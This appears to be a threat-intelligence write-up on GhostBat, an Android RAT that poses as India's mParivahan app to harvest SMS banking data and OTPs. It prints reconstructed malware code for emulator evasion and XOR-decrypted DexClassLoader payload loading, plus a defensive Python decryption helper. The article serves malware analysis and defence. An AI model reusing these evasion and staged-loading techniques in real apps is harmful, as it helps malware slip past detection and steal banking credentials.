The GhostBat RAT campaign has emerged as a sophisticated threat targeting Indian Android users through counterfeit Regional Transport Office (RTO) applications.
First observed in mid-2025, these malicious APKs masquerade as the official “mParivahan” app, exploiting user trust in government services.
Distribution occurs primarily via smishing—WhatsApp messages and SMS containing shortened URLs redirecting victims to GitHub-hosted payloads—or through compromised websites.
Once installed, the malware prompts victims to grant SMS-related permissions under the guise of essential updates, setting the stage for banking data exfiltration.
Upon installation, the app displays a phishing interface remarkably similar to the genuine mParivahan layout.
The victim is prompted to enter vehicle and mobile details, followed by a fake UPI payment request of ₹1 to “verify ownership.”
Meanwhile, SMS messages containing banking-related keywords are harvested and exfiltrated to attacker-controlled servers.
Incoming one-time passwords (OTPs) can be forwarded directly to adversaries, facilitating unauthorized transactions.
Cyble analysts noted the incorporation of a Telegram bot, GhostBatRatbot, which registers infected devices and serves as a command channel for stolen data.
Underneath the social engineering facade, GhostBat RAT relies on multiple anti-analysis and obfuscation tactics.
The initial dropper performs anti-emulation checks by interrogating Build.CPU_ABI and Build.MANUFACTURER values, terminating execution if an emulator is detected.
Sample code from this stage illustrates the heavy string obfuscation and emulator avoidance logic:
    import android.os.Build;
    import java.util.Locale;

    // Emulator check used by the dropper: it bails out on x86 ABIs and on
    // manufacturer strings that are typical of emulator system images.
    public static boolean isRealDevice(String abi) {
        if (abi.equals("x86") || abi.equals("x86_64")) {
            return false;
        }
        String manufacturer = Build.MANUFACTURER.toLowerCase(Locale.ROOT);
        if (manufacturer.contains("generic") || manufacturer.contains("emulator")) {
            return false;
        }
        return true;
    }
A multi-stage dropper then decrypts embedded payloads using XOR operations and dynamic DexClassLoader loading, ensuring detection evasion.
Native libraries (.so) further complicate analysis by reconstructing API calls in memory via JNI. These layers collectively hinder reverse engineering and antivirus detection.
GhostBat RAT’s Infection Mechanism
The full infection chain starts with smishing URLs disguised as RTO services. After clicking a shortened link, the user downloads an APK hosted on GitHub or a similar platform.
The installer requests SMS-read and SMS-send permissions, which victims often grant under the pretext of service functionality.
Once permissions are in place, the dropper decrypts its second-stage payload:

    import android.content.Context;
    import dalvik.system.DexClassLoader;
    import java.io.InputStream;
    import java.nio.charset.StandardCharsets;
    import java.security.MessageDigest;

    // Second-stage loader as reconstructed from the dropper. saveToFile() is not
    // shown on the page; it writes the decrypted bytes to disk and returns the path.
    static DexClassLoader loadSecondStage(Context context) throws Exception {
        InputStream in = context.getAssets().open("encrypted_payload");
        byte[] data = new byte[in.available()];
        in.read(data);  // the dropper assumes the whole asset is returned in one read
        in.close();
        // The XOR key is simply the SHA-1 digest of the asset's own file name.
        byte[] key = MessageDigest.getInstance("SHA-1")
                .digest("encrypted_payload".getBytes(StandardCharsets.UTF_8));
        for (int i = 0; i < data.length; i++) {
            data[i] ^= key[i % key.length];  // 20-byte key cycled over the payload
        }
        // The decrypted DEX is written to disk and loaded at runtime, so it never
        // appears in the APK's static classes.dex.
        return new DexClassLoader(
                saveToFile(data), context.getCacheDir().getAbsolutePath(),
                null, context.getClassLoader()
        );
    }
This decrypted component houses the credential stealer and cryptominer modules, which are loaded dynamically.
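Because the key is derived only from the asset's file name, an analyst can recover the second stage statically without running the dropper. The following Python helper is an added example (not Cyble's tooling or the malware's code): it mirrors the SHA-1/XOR scheme above and checks that the result carries a DEX header before trusting it. The encrypted blob is constructed inline here; in practice it would be the assets/encrypted_payload entry extracted from the APK zip.

```python
import hashlib
from typing import Optional

ASSET_NAME = "encrypted_payload"   # asset name used by the dropper on this page
DEX_MAGIC_PREFIX = b"dex\n"        # every DEX file starts with "dex\n" + version + NUL


def derive_key(asset_name: str) -> bytes:
    """Mirror the dropper: the XOR key is SHA-1 of the asset's file name."""
    return hashlib.sha1(asset_name.encode("utf-8")).digest()


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """Cycle the 20-byte key over the data; XOR is symmetric, so this both
    encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_dex(blob: bytes) -> bool:
    """Sanity check on the decrypted output: 'dex\\n', three digits, NUL."""
    return (len(blob) >= 8 and blob.startswith(DEX_MAGIC_PREFIX)
            and blob[4:7].isdigit() and blob[7] == 0)


def recover_payload(asset_name: str, encrypted: bytes) -> Optional[bytes]:
    """Decrypt an extracted asset and return it only if it is a plausible DEX;
    None means the key guess (asset name) was wrong or the scheme changed."""
    plain = xor_cycle(encrypted, derive_key(asset_name))
    return plain if looks_like_dex(plain) else None


def build_sample() -> bytes:
    """Constructed test input: a fake DEX encrypted exactly as the dropper does.
    Stands in for the real assets/encrypted_payload entry."""
    fake_dex = b"dex\n035\x00" + b"\x00" * 24 + b"constructed-second-stage"
    return xor_cycle(fake_dex, derive_key(ASSET_NAME))


if __name__ == "__main__":
    recovered = recover_payload(ASSET_NAME, build_sample())
    print("recovered DEX" if recovered else "not a DEX after decryption")
```

A None result is the signal to stop and re-derive the key rather than load whatever came out; a real sample would then go to a DEX disassembler to find the SMS-harvesting classes.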
The final payload mimics a genuine app update page, tricking users into installing the malicious mParivahan app.
By chaining these stages, GhostBat RAT achieves stealthy installation and robust persistence, making it a significant risk to Indian mobile banking users.